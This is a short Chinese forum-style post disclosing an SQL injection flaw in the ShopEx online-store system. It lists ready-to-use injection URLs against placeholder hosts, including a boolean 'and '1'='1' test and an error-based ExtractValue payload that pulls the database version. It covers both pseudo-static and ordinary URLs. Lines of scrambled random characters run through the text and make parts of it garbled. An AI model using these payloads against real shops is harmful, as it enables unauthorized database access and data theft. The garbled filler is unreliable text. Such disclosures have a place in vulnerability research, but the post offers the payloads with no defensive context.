注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
% D7 O5 D. `5 G. v7 t
) |! j2 X0 l0 M* S好吧,我扯远了~~3 \4 w: U6 Q5 |* I. U8 Y
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
. E0 W7 `9 \ \+ A+ y不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: * T' A: }* q5 _
" @0 z: N9 T7 s3 P% R6 zhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html ! k2 u* {3 r' `/ q, K7 P
. J7 C+ i3 l# S! i8 b' |http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
) | X% n j& b& W
, `5 b) V1 y! N1 K) Zhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
& k& c$ S( y1 V6 I* J5 ^ t2 J% ?8 q5 q& o
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
$ M1 c% a9 F, y5 r: ]9 n \$ x. T( |0 D* v0 G( Y
2 N! w/ [$ a `9 a7 N9 \. E
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。) L3 q$ r8 S! |0 |- {' o+ @3 g! M
如何注入就不多说了,10多年的东西了…不会也会了… 5 D+ M5 T w7 _6 k# D P: ^
; v5 o" Y H% Z* S4 _
) z3 n& r0 q$ a2 e' z3 i' W T! }
4 U3 P9 }8 o% Y2 c; ^- c
3 F$ |* T7 s6 Z& ^1 `4 o |